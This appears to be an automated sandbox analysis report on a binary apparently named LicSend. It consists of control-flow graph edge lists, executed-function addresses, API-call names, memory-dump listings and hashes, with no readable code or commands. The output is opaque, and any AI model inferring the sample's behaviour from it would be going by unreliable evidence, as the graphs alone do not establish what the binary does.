5529->5530 5530->5527 5533 7ff7d3b9abc0 malloc 5532->5533 5534 7ff7d3b9ab87 malloc 5532->5534 5535 7ff7d3b9ac02 abort 5533->5535 5537 7ff7d3b9abcf 5533->5537 5534->5535 5536 7ff7d3b9ab95 5534->5536 5538 7ff7d3b9aba8 memcpy 5536->5538 5539 7ff7d3b9abea memset 5536->5539 5537->5538 5537->5539 5538->5526 5539->5526 5541 7ff7d3b9ac60 GetLastError 5540->5541 5542 7ff7d3b9ac43 5540->5542 5541->5542 5543 7ff7d3b9ac68 abort 5542->5543 5544 7ff7d3b9ac5b 5542->5544 5544->5508 5855 7ff7d3b9d6c0 5856 7ff7d3b9d6c8 5855->5856 5857 7ff7d3b9d430 2 API calls 5856->5857 5858 7ff7d3b9d6f0 5857->5858 6066 7ff7d3b9d740 6067 7ff7d3b9d430 2 API calls 6066->6067 6068 7ff7d3b9d6f1 6067->6068 6069 7ff7d3b99f43 6070 7ff7d3b99f71 6069->6070 6071 7ff7d3b99fd3 6070->6071 6072 7ff7d3b99f7f 6070->6072 6073 7ff7d3b99ff2 signal 6070->6073 6079 7ff7d3b99fc5 6070->6079 6074 7ff7d3b99fe0 6071->6074 6076 7ff7d3b99fbc 6071->6076 6077 7ff7d3b9a030 6071->6077 6072->6077 6078 7ff7d3b99f90 6072->6078 6072->6079 6075 7ff7d3b9a008 signal 6073->6075 6073->6076 6074->6073 6074->6076 6074->6079 6075->6079 6076->6079 6081 7ff7d3b9a0e0 signal 6076->6081 6077->6076 6077->6079 6080 7ff7d3b9a03e signal 6077->6080 6078->6076 6078->6079 6082 7ff7d3b99fa6 signal 6078->6082 6080->6076 6083 7ff7d3b9a0f9 signal 6080->6083 6081->6079 6082->6076 6084 7ff7d3b9a110 signal 6082->6084 6083->6079 6084->6079 6085 7ff7d3b9ca37 6086 7ff7d3b9cb74 6085->6086 6087 7ff7d3b9ca54 6085->6087 6088 7ff7d3b9d26f wcslen 6086->6088 6089 7ff7d3b9cb9c 6086->6089 6090 7ff7d3b9b7e0 strlen 6087->6090 6091 7ff7d3b9b280 2 API calls 6089->6091 6094 7ff7d3b9ca5c 6090->6094 6092 7ff7d3b9cbb4 6091->6092 6093 7ff7d3b9d0e0 6096 7ff7d3b9b930 10 API calls 6093->6096 6094->6093 6095 7ff7d3b9b930 10 API calls 6094->6095 6095->6094 6097 7ff7d3b9d0fa 6096->6097 6097->6097 6098 7ff7d3b9a650 6099 7ff7d3b9a6e0 6098->6099 6100 7ff7d3b9a667 6098->6100 6101 7ff7d3b9a691 calloc 6100->6101 6102 7ff7d3b9a678 _assert 6100->6102 6101->6099 6103 7ff7d3b9a6a8 TlsGetValue TlsSetValue 6101->6103 6102->6101 5865 7ff7d3b9cad4 5866 7ff7d3b9d0e0 5865->5866 5867 7ff7d3b9ca64 5865->5867 5869 7ff7d3b9b930 10 API calls 5866->5869 5867->5865 5871 7ff7d3b9b930 5867->5871 5870 7ff7d3b9d0fa 5869->5870 5870->5870 5872 7ff7d3b9b944 5871->5872 5873 7ff7d3b9b9c0 5872->5873 5874 7ff7d3b9b984 5872->5874 5875 7ff7d3b9b160 8 API calls 5873->5875 5876 7ff7d3b9b400 6 API calls 5874->5876 5877 7ff7d3b9b9cf 5875->5877 5878 7ff7d3b9b993 5876->5878 5877->5867 5878->5867 6104 7ff7d3b9cd49 6105 7ff7d3b9cd70 6104->6105 6106 7ff7d3b9cd83 6104->6106 6110 7ff7d3b9bdc0 6105->6110 6108 7ff7d3b9bdc0 10 API calls 6106->6108 6109 7ff7d3b9d119 6108->6109 6109->6109 6111 7ff7d3b9bdd4 6110->6111 6112 7ff7d3b9be40 6111->6112 6113 7ff7d3b9be0b 6111->6113 6114 7ff7d3b9b160 8 API calls 6112->6114 6115 7ff7d3b9bce0 6 API calls 6113->6115 6116 7ff7d3b9be4f 6114->6116 6117 7ff7d3b9be1a 6115->6117 6116->6106 6117->6106 5879 7ff7d3b9accb SetLastError 5880 7ff7d3b9ad90 calloc 5879->5880 5886 7ff7d3b9acdf 5879->5886 5881 7ff7d3b9adb0 5880->5881 5882 7ff7d3b9aec3 abort 5880->5882 5884 7ff7d3b9adb3 TlsSetValue 5881->5884 5883 7ff7d3b9aed5 5882->5883 5889 7ff7d3b9aceb 5884->5889 5885 7ff7d3b9ab70 5 API calls 5888 7ff7d3b9ac97 5885->5888 5886->5882 5887 7ff7d3b9ae05 memset 5886->5887 5886->5889 5887->5884 5889->5885 5889->5888

                                                                                                    Executed Functions

                                                                                                    Function 00007FF7D3B952DC Relevance: 47.0, APIs: 24, Strings: 2, Instructions: 1482COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 7ff7d3b952dc-7ff7d3b952e9 1 7ff7d3b952ef-7ff7d3b95568 call 7ff7d3b9ac70 * 3 call 7ff7d3b985b0 memset call 7ff7d3b9ac70 * 2 call 7ff7d3b985b0 memset call 7ff7d3b9ac70 0->1 2 7ff7d3b9669c-7ff7d3b966de call 7ff7d3b9ac70 call 7ff7d3b9a3b0 0->2 47 7ff7d3b965ff-7ff7d3b96697 call 7ff7d3b9ac70 call 7ff7d3b9a3b0 1->47 48 7ff7d3b9556e-7ff7d3b955f8 call 7ff7d3b9ac70 call 7ff7d3b985b0 memcpy call 7ff7d3b9ac70 1->48 12 7ff7d3b966e3-7ff7d3b96778 call 7ff7d3b9ac70 call 7ff7d3b9a3b0 2->12 22 7ff7d3b96782-7ff7d3b97273 call 7ff7d3b9feb8 call 7ff7d3b94db0 call 7ff7d3b94d20 call 7ff7d3b94ca0 call 7ff7d3b94c20 call 7ff7d3b94b90 call 7ff7d3b94b00 call 7ff7d3b94a80 call 7ff7d3b949f0 call 7ff7d3b94960 call 7ff7d3b948d0 call 7ff7d3b94850 call 7ff7d3b947e0 call 7ff7d3b94760 call 7ff7d3b946d0 call 7ff7d3b94640 call 7ff7d3b945b0 call 7ff7d3b94540 call 7ff7d3b944c0 call 7ff7d3b94440 call 7ff7d3b943b0 call 7ff7d3b94320 call 7ff7d3b94290 call 7ff7d3b94200 call 7ff7d3b94170 call 7ff7d3b940f0 call 7ff7d3b94060 call 7ff7d3b93fe0 call 7ff7d3b93f70 call 7ff7d3b93ef0 call 7ff7d3b93e70 call 7ff7d3b93de0 call 7ff7d3b93d50 call 7ff7d3b93cd0 call 7ff7d3b93c60 call 7ff7d3b93bd0 call 7ff7d3b93b40 call 7ff7d3b93ab0 call 7ff7d3b93a20 call 7ff7d3b939a0 call 7ff7d3b93920 call 7ff7d3b938a0 call 7ff7d3b93830 call 7ff7d3b937b0 call 7ff7d3b93720 call 7ff7d3b936a0 call 7ff7d3b93620 call 7ff7d3b935b0 call 7ff7d3b93530 call 7ff7d3b934a0 call 7ff7d3b93420 call 7ff7d3b93390 call 7ff7d3b93300 call 7ff7d3b93280 call 7ff7d3b93210 call 7ff7d3b93180 call 7ff7d3b93100 call 7ff7d3b93080 call 7ff7d3b93000 call 7ff7d3b92f80 call 7ff7d3b92f00 call 7ff7d3b92e70 call 7ff7d3b92de0 call 7ff7d3b92d50 call 7ff7d3b92cc0 call 7ff7d3b92c40 call 7ff7d3b92bd0 call 7ff7d3b92b50 call 7ff7d3b92ad0 call 7ff7d3b92a50 call 7ff7d3b929e0 call 7ff7d3b92970 call 7ff7d3b928f0 call 7ff7d3b92860 call 7ff7d3b927f0 call 7ff7d3b92760 call 7ff7d3b926e0 call 7ff7d3b92630 call 7ff7d3b925b0 call 7ff7d3b92520 call 7ff7d3b92480 call 7ff7d3b923e0 call 7ff7d3b92340 call 7ff7d3b922c0 call 7ff7d3b92220 call 7ff7d3b92190 call 7ff7d3b92100 call 7ff7d3b92070 call 7ff7d3b91ff0 call 7ff7d3b91f70 call 7ff7d3b91ed0 12->22 457 7ff7d3b97530-7ff7d3b97576 memset call 7ff7d3b985b0 memset call 7ff7d3b985b0 22->457 47->2 68 7ff7d3b965c5-7ff7d3b965fa call 7ff7d3b9ac70 memcpy call 7ff7d3b9a3b0 48->68 69 7ff7d3b955fe-7ff7d3b95690 call 7ff7d3b9ac70 call 7ff7d3b97f10 memcpy call 7ff7d3b9ac70 48->69 68->47 89 7ff7d3b95696-7ff7d3b95722 call 7ff7d3b9ac70 call 7ff7d3b97f10 memcpy call 7ff7d3b9ac70 69->89 90 7ff7d3b9658b-7ff7d3b965c0 call 7ff7d3b9ac70 memcpy call 7ff7d3b9a3b0 69->90 110 7ff7d3b96551-7ff7d3b96586 call 7ff7d3b9ac70 memcpy call 7ff7d3b9a3b0 89->110 111 7ff7d3b95728-7ff7d3b957f4 call 7ff7d3b9ac70 call 7ff7d3b97f10 memset call 7ff7d3b9ac70 89->111 90->68 110->90 131 7ff7d3b964f0-7ff7d3b9654c call 7ff7d3b9ac70 call 7ff7d3b9a3b0 111->131 132 7ff7d3b957fa-7ff7d3b95860 call 7ff7d3b9ac70 call 7ff7d3b985b0 call 7ff7d3b98a60 111->132 131->110 152 7ff7d3b95862-7ff7d3b958b0 call 7ff7d3b995a7 132->152 153 7ff7d3b958b6-7ff7d3b95950 memset GetModuleFileNameW memset call 7ff7d3b9ac70 132->153 152->22 152->153 161 7ff7d3b9645f-7ff7d3b964eb call 7ff7d3b9ac70 call 7ff7d3b9a3b0 153->161 162 7ff7d3b95956-7ff7d3b9596b call 7ff7d3b9ac70 153->162 161->131 169 7ff7d3b959a5-7ff7d3b959fa call 7ff7d3b9ac70 * 2 162->169 170 7ff7d3b9596d-7ff7d3b95979 162->170 185 7ff7d3b95a49-7ff7d3b95a4d 169->185 186 7ff7d3b959fc-7ff7d3b95a44 call 7ff7d3b9a3b0 169->186 173 7ff7d3b95980-7ff7d3b9599d 170->173 173->173 178 7ff7d3b9599f 173->178 178->169 189 7ff7d3b95a4f-7ff7d3b95a72 185->189 190 7ff7d3b95a78-7ff7d3b95ac8 call 7ff7d3b985b0 memcpy call 7ff7d3b9ac70 * 2 185->190 186->185 189->190 207 7ff7d3b95b03-7ff7d3b95b0b 190->207 208 7ff7d3b95aca-7ff7d3b95afe memcpy call 7ff7d3b9a3b0 190->208 211 7ff7d3b95b49-7ff7d3b95bb8 call 7ff7d3b97f10 memset call 7ff7d3b9ac70 207->211 212 7ff7d3b95b0d-7ff7d3b95b19 207->212 208->207 226 7ff7d3b96405-7ff7d3b9645a call 7ff7d3b9ac70 call 7ff7d3b9a3b0 211->226 227 7ff7d3b95bbe-7ff7d3b95bd2 call 7ff7d3b9ac70 211->227 216 7ff7d3b95b20-7ff7d3b95b3f 212->216 216->216 220 7ff7d3b95b41 216->220 220->211 226->161 236 7ff7d3b95bd4-7ff7d3b95bf4 227->236 237 7ff7d3b95bf8-7ff7d3b95c13 call 7ff7d3b985b0 _wcsicmp 227->237 236->237 244 7ff7d3b975c0-7ff7d3b97619 call 7ff7d3b98a60 call 7ff7d3b98c10 call 7ff7d3b95110 call 7ff7d3b94f00 237->244 245 7ff7d3b95c19-7ff7d3b95c72 memset call 7ff7d3b9ac70 * 2 237->245 277 7ff7d3b9761e-7ff7d3b9764c call 7ff7d3b9ac70 call 7ff7d3b9a3b0 244->277 258 7ff7d3b95cb1-7ff7d3b95cb5 245->258 259 7ff7d3b95c74-7ff7d3b95cac call 7ff7d3b9a3b0 245->259 263 7ff7d3b95cb7-7ff7d3b95cd6 258->263 264 7ff7d3b95cda-7ff7d3b95d61 call 7ff7d3b985b0 call 7ff7d3b95110 call 7ff7d3b9ac70 258->264 259->258 263->264 264->12 285 7ff7d3b95d67-7ff7d3b95d7b call 7ff7d3b9ac70 264->285 295 7ff7d3b97651-7ff7d3b9769a call 7ff7d3b9ac70 call 7ff7d3b9a3b0 277->295 293 7ff7d3b95db4-7ff7d3b95e34 call 7ff7d3b94f00 memset call 7ff7d3b9ac70 285->293 294 7ff7d3b95d7d-7ff7d3b95d89 285->294 293->295 310 7ff7d3b95e3a-7ff7d3b95e46 call 7ff7d3b9ac70 293->310 299 7ff7d3b95d90-7ff7d3b95dad 294->299 307 7ff7d3b9769f 295->307 299->299 300 7ff7d3b95daf 299->300 300->293 307->307 317 7ff7d3b95e72-7ff7d3b95ec2 call 7ff7d3b9ac70 * 2 310->317 318 7ff7d3b95e48-7ff7d3b95e6b 310->318 328 7ff7d3b95ec4-7ff7d3b95f07 call 7ff7d3b9a3b0 317->328 329 7ff7d3b95f0c-7ff7d3b95f10 317->329 318->317 328->329 331 7ff7d3b95f12-7ff7d3b95f35 329->331 332 7ff7d3b95f3b-7ff7d3b95fa9 call 7ff7d3b985b0 memset call 7ff7d3b9ac70 * 2 329->332 331->332 350 7ff7d3b95fe4-7ff7d3b95fe8 332->350 351 7ff7d3b95fab-7ff7d3b95fdf call 7ff7d3b9a3b0 332->351 354 7ff7d3b9600f-7ff7d3b9606e call 7ff7d3b985b0 call 7ff7d3b95110 call 7ff7d3b98c10 call 7ff7d3b97fd0 call 7ff7d3b9ac70 350->354 355 7ff7d3b95fea-7ff7d3b9600b 350->355 351->350 354->277 376 7ff7d3b96074-7ff7d3b96081 call 7ff7d3b9ac70 354->376 355->354 382 7ff7d3b96083-7ff7d3b96099 376->382 383 7ff7d3b9609e-7ff7d3b96119 call 7ff7d3b9ac70 * 2 376->383 382->383 393 7ff7d3b9611f-7ff7d3b9619e call 7ff7d3b9a3b0 383->393 394 7ff7d3b961a3-7ff7d3b961a7 383->394 393->394 398 7ff7d3b961a9-7ff7d3b961b5 394->398 399 7ff7d3b961da-7ff7d3b9621a call 7ff7d3b9ac70 * 2 394->399 401 7ff7d3b961b8-7ff7d3b961d4 398->401 411 7ff7d3b96259-7ff7d3b9625e 399->411 412 7ff7d3b9621c-7ff7d3b96254 call 7ff7d3b9a3b0 399->412 401->401 404 7ff7d3b961d6 401->404 404->399 414 7ff7d3b96260-7ff7d3b96281 411->414 415 7ff7d3b96285-7ff7d3b962bb memcpy call 7ff7d3b9ac70 * 2 411->415 412->411 414->415 426 7ff7d3b962ea-7ff7d3b962f3 415->426 427 7ff7d3b962bd-7ff7d3b962e5 memcpy call 7ff7d3b9a3b0 415->427 430 7ff7d3b96332-7ff7d3b9637e call 7ff7d3b95110 * 2 call 7ff7d3b9ac70 * 2 426->430 431 7ff7d3b962f5-7ff7d3b96301 426->431 427->426 450 7ff7d3b96380-7ff7d3b9639e call 7ff7d3b9a3b0 430->450 451 7ff7d3b963a3-7ff7d3b963a7 430->451 433 7ff7d3b96308-7ff7d3b96327 431->433 433->433 437 7ff7d3b96329 433->437 437->430 450->451 454 7ff7d3b963c1-7ff7d3b963d0 _wcsicmp 451->454 455 7ff7d3b963a9-7ff7d3b963bd 451->455 454->457 458 7ff7d3b963d6-7ff7d3b963d9 454->458 455->454 470 7ff7d3b975b0-7ff7d3b975be 457->470 471 7ff7d3b97578-7ff7d3b9757f 457->471 458->457 461 7ff7d3b963df-7ff7d3b96404 458->461 473 7ff7d3b97586-7ff7d3b975a3 call 7ff7d3b94f00 470->473 471->473 473->470
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Y//uu$}==
                                                                                                    • API String ID: 0-1096410806
                                                                                                    • Opcode ID: 85d6259d61b3ecca2f2fe6b017458283f752f61dd0bb6211a4f5604068124955
                                                                                                    • Instruction ID: c8d93c7056680f272d6fbde8504e74cf40bfd7a9748bf276e430ab4414d00fa7
                                                                                                    • Opcode Fuzzy Hash: 85d6259d61b3ecca2f2fe6b017458283f752f61dd0bb6211a4f5604068124955
                                                                                                    • Instruction Fuzzy Hash: 4CF27D6190EBC684EBA1AB25A4453AEEBE0EB45784FC44036DACC27796DF7CD144C770
                                                                                                    Function 00007FF7D3B952FD Relevance: 37.6, APIs: 19, Strings: 2, Instructions: 878COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 573 7ff7d3b952fd-7ff7d3b95568 call 7ff7d3b9ac70 * 2 call 7ff7d3b985b0 memset call 7ff7d3b9ac70 * 2 call 7ff7d3b985b0 memset call 7ff7d3b9ac70 594 7ff7d3b965ff-7ff7d3b966de call 7ff7d3b9ac70 call 7ff7d3b9a3b0 call 7ff7d3b9ac70 call 7ff7d3b9a3b0 573->594 595 7ff7d3b9556e-7ff7d3b955f8 call 7ff7d3b9ac70 call 7ff7d3b985b0 memcpy call 7ff7d3b9ac70 573->595 622 7ff7d3b966e3-7ff7d3b96778 call 7ff7d3b9ac70 call 7ff7d3b9a3b0 594->622 609 7ff7d3b965c5-7ff7d3b965fa call 7ff7d3b9ac70 memcpy call 7ff7d3b9a3b0 595->609 610 7ff7d3b955fe-7ff7d3b95690 call 7ff7d3b9ac70 call 7ff7d3b97f10 memcpy call 7ff7d3b9ac70 595->610 609->594 629 7ff7d3b95696-7ff7d3b95722 call 7ff7d3b9ac70 call 7ff7d3b97f10 memcpy call 7ff7d3b9ac70 610->629 630 7ff7d3b9658b-7ff7d3b965c0 call 7ff7d3b9ac70 memcpy call 7ff7d3b9a3b0 610->630 635 7ff7d3b96782-7ff7d3b96a15 call 7ff7d3b9feb8 call 7ff7d3b94db0 call 7ff7d3b94d20 call 7ff7d3b94ca0 call 7ff7d3b94c20 call 7ff7d3b94b90 call 7ff7d3b94b00 call 7ff7d3b94a80 call 7ff7d3b949f0 call 7ff7d3b94960 call 7ff7d3b948d0 call 7ff7d3b94850 call 7ff7d3b947e0 call 7ff7d3b94760 call 7ff7d3b946d0 call 7ff7d3b94640 call 7ff7d3b945b0 call 7ff7d3b94540 call 7ff7d3b944c0 call 7ff7d3b94440 call 7ff7d3b943b0 call 7ff7d3b94320 call 7ff7d3b94290 622->635 649 7ff7d3b96551-7ff7d3b96586 call 7ff7d3b9ac70 memcpy call 7ff7d3b9a3b0 629->649 650 7ff7d3b95728-7ff7d3b957f4 call 7ff7d3b9ac70 call 7ff7d3b97f10 memset call 7ff7d3b9ac70 629->650 630->609 821 7ff7d3b96a1a-7ff7d3b97273 call 7ff7d3b94200 call 7ff7d3b94170 call 7ff7d3b940f0 call 7ff7d3b94060 call 7ff7d3b93fe0 call 7ff7d3b93f70 call 7ff7d3b93ef0 call 7ff7d3b93e70 call 7ff7d3b93de0 call 7ff7d3b93d50 call 7ff7d3b93cd0 call 7ff7d3b93c60 call 7ff7d3b93bd0 call 7ff7d3b93b40 call 7ff7d3b93ab0 call 7ff7d3b93a20 call 7ff7d3b939a0 call 7ff7d3b93920 call 7ff7d3b938a0 call 7ff7d3b93830 call 7ff7d3b937b0 call 7ff7d3b93720 call 7ff7d3b936a0 call 7ff7d3b93620 call 7ff7d3b935b0 call 7ff7d3b93530 call 7ff7d3b934a0 call 7ff7d3b93420 call 7ff7d3b93390 call 7ff7d3b93300 call 7ff7d3b93280 call 7ff7d3b93210 call 7ff7d3b93180 call 7ff7d3b93100 call 7ff7d3b93080 call 7ff7d3b93000 call 7ff7d3b92f80 call 7ff7d3b92f00 call 7ff7d3b92e70 call 7ff7d3b92de0 call 7ff7d3b92d50 call 7ff7d3b92cc0 call 7ff7d3b92c40 call 7ff7d3b92bd0 call 7ff7d3b92b50 call 7ff7d3b92ad0 call 7ff7d3b92a50 call 7ff7d3b929e0 call 7ff7d3b92970 call 7ff7d3b928f0 call 7ff7d3b92860 call 7ff7d3b927f0 call 7ff7d3b92760 call 7ff7d3b926e0 call 7ff7d3b92630 call 7ff7d3b925b0 call 7ff7d3b92520 call 7ff7d3b92480 call 7ff7d3b923e0 call 7ff7d3b92340 call 7ff7d3b922c0 call 7ff7d3b92220 call 7ff7d3b92190 call 7ff7d3b92100 call 7ff7d3b92070 call 7ff7d3b91ff0 call 7ff7d3b91f70 call 7ff7d3b91ed0 635->821 649->630 670 7ff7d3b964f0-7ff7d3b9654c call 7ff7d3b9ac70 call 7ff7d3b9a3b0 650->670 671 7ff7d3b957fa-7ff7d3b95860 call 7ff7d3b9ac70 call 7ff7d3b985b0 call 7ff7d3b98a60 650->671 670->649 691 7ff7d3b95862-7ff7d3b958a9 call 7ff7d3b995a7 671->691 692 7ff7d3b958b6-7ff7d3b95950 memset GetModuleFileNameW memset call 7ff7d3b9ac70 671->692 697 7ff7d3b958ae-7ff7d3b958b0 691->697 701 7ff7d3b9645f-7ff7d3b964eb call 7ff7d3b9ac70 call 7ff7d3b9a3b0 692->701 702 7ff7d3b95956-7ff7d3b9596b call 7ff7d3b9ac70 692->702 697->635 697->692 701->670 710 7ff7d3b959a5-7ff7d3b959fa call 7ff7d3b9ac70 * 2 702->710 711 7ff7d3b9596d-7ff7d3b95979 702->711 725 7ff7d3b95a49-7ff7d3b95a4d 710->725 726 7ff7d3b959fc-7ff7d3b95a44 call 7ff7d3b9a3b0 710->726 714 7ff7d3b95980-7ff7d3b9599d 711->714 714->714 718 7ff7d3b9599f 714->718 718->710 729 7ff7d3b95a4f-7ff7d3b95a72 725->729 730 7ff7d3b95a78-7ff7d3b95ac8 call 7ff7d3b985b0 memcpy call 7ff7d3b9ac70 * 2 725->730 726->725 729->730 747 7ff7d3b95b03-7ff7d3b95b0b 730->747 748 7ff7d3b95aca-7ff7d3b95afe memcpy call 7ff7d3b9a3b0 730->748 752 7ff7d3b95b49-7ff7d3b95bb8 call 7ff7d3b97f10 memset call 7ff7d3b9ac70 747->752 753 7ff7d3b95b0d-7ff7d3b95b19 747->753 748->747 765 7ff7d3b96405-7ff7d3b9645a call 7ff7d3b9ac70 call 7ff7d3b9a3b0 752->765 766 7ff7d3b95bbe-7ff7d3b95bd2 call 7ff7d3b9ac70 752->766 757 7ff7d3b95b20-7ff7d3b95b3f 753->757 757->757 760 7ff7d3b95b41 757->760 760->752 765->701 775 7ff7d3b95bd4-7ff7d3b95bf4 766->775 776 7ff7d3b95bf8-7ff7d3b95c13 call 7ff7d3b985b0 _wcsicmp 766->776 775->776 783 7ff7d3b975c0-7ff7d3b97614 call 7ff7d3b98a60 call 7ff7d3b98c10 call 7ff7d3b95110 call 7ff7d3b94f00 776->783 784 7ff7d3b95c19-7ff7d3b95c72 memset call 7ff7d3b9ac70 * 2 776->784 812 7ff7d3b97619 783->812 798 7ff7d3b95cb1-7ff7d3b95cb5 784->798 799 7ff7d3b95c74-7ff7d3b95cac call 7ff7d3b9a3b0 784->799 804 7ff7d3b95cb7-7ff7d3b95cd6 798->804 805 7ff7d3b95cda-7ff7d3b95d61 call 7ff7d3b985b0 call 7ff7d3b95110 call 7ff7d3b9ac70 798->805 799->798 804->805 805->622 825 7ff7d3b95d67-7ff7d3b95d7b call 7ff7d3b9ac70 805->825 817 7ff7d3b9761e-7ff7d3b9764c call 7ff7d3b9ac70 call 7ff7d3b9a3b0 812->817 835 7ff7d3b97651-7ff7d3b9769a call 7ff7d3b9ac70 call 7ff7d3b9a3b0 817->835 997 7ff7d3b97530-7ff7d3b97576 memset call 7ff7d3b985b0 memset call 7ff7d3b985b0 821->997 833 7ff7d3b95db4-7ff7d3b95e34 call 7ff7d3b94f00 memset call 7ff7d3b9ac70 825->833 834 7ff7d3b95d7d-7ff7d3b95d89 825->834 833->835 851 7ff7d3b95e3a-7ff7d3b95e46 call 7ff7d3b9ac70 833->851 839 7ff7d3b95d90-7ff7d3b95dad 834->839 847 7ff7d3b9769f 835->847 839->839 840 7ff7d3b95daf 839->840 840->833 847->847 857 7ff7d3b95e72-7ff7d3b95ec2 call 7ff7d3b9ac70 * 2 851->857 858 7ff7d3b95e48-7ff7d3b95e6b 851->858 868 7ff7d3b95ec4-7ff7d3b95f07 call 7ff7d3b9a3b0 857->868 869 7ff7d3b95f0c-7ff7d3b95f10 857->869 858->857 868->869 871 7ff7d3b95f12-7ff7d3b95f35 869->871 872 7ff7d3b95f3b-7ff7d3b95fa9 call 7ff7d3b985b0 memset call 7ff7d3b9ac70 * 2 869->872 871->872 890 7ff7d3b95fe4-7ff7d3b95fe8 872->890 891 7ff7d3b95fab-7ff7d3b95fdf call 7ff7d3b9a3b0 872->891 894 7ff7d3b9600f-7ff7d3b9606e call 7ff7d3b985b0 call 7ff7d3b95110 call 7ff7d3b98c10 call 7ff7d3b97fd0 call 7ff7d3b9ac70 890->894 895 7ff7d3b95fea-7ff7d3b9600b 890->895 891->890 894->817 916 7ff7d3b96074-7ff7d3b96081 call 7ff7d3b9ac70 894->916 895->894 923 7ff7d3b96083-7ff7d3b96099 916->923 924 7ff7d3b9609e-7ff7d3b96119 call 7ff7d3b9ac70 * 2 916->924 923->924 933 7ff7d3b9611f-7ff7d3b9619e call 7ff7d3b9a3b0 924->933 934 7ff7d3b961a3-7ff7d3b961a7 924->934 933->934 937 7ff7d3b961a9-7ff7d3b961b5 934->937 938 7ff7d3b961da-7ff7d3b9621a call 7ff7d3b9ac70 * 2 934->938 940 7ff7d3b961b8-7ff7d3b961d4 937->940 951 7ff7d3b96259-7ff7d3b9625e 938->951 952 7ff7d3b9621c-7ff7d3b96254 call 7ff7d3b9a3b0 938->952 940->940 943 7ff7d3b961d6 940->943 943->938 954 7ff7d3b96260-7ff7d3b96281 951->954 955 7ff7d3b96285-7ff7d3b962bb memcpy call 7ff7d3b9ac70 * 2 951->955 952->951 954->955 966 7ff7d3b962ea-7ff7d3b962f3 955->966 967 7ff7d3b962bd-7ff7d3b962e5 memcpy call 7ff7d3b9a3b0 955->967 970 7ff7d3b96332-7ff7d3b9637e call 7ff7d3b95110 * 2 call 7ff7d3b9ac70 * 2 966->970 971 7ff7d3b962f5-7ff7d3b96301 966->971 967->966 990 7ff7d3b96380-7ff7d3b9639e call 7ff7d3b9a3b0 970->990 991 7ff7d3b963a3-7ff7d3b963a7 970->991 973 7ff7d3b96308-7ff7d3b96327 971->973 973->973 977 7ff7d3b96329 973->977 977->970 990->991 994 7ff7d3b963c1-7ff7d3b963d0 _wcsicmp 991->994 995 7ff7d3b963a9-7ff7d3b963bd 991->995 994->997 998 7ff7d3b963d6-7ff7d3b963d9 994->998 995->994 1010 7ff7d3b975b0-7ff7d3b975be 997->1010 1011 7ff7d3b97578-7ff7d3b9757f 997->1011 998->997 1001 7ff7d3b963df-7ff7d3b96404 998->1001 1013 7ff7d3b97586-7ff7d3b975a3 call 7ff7d3b94f00 1010->1013 1011->1013 1013->1010
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy$_wcsicmp$FileModuleNamewcscpy
                                                                                                    • String ID: Y//uu$}==
                                                                                                    • API String ID: 1189637815-1096410806
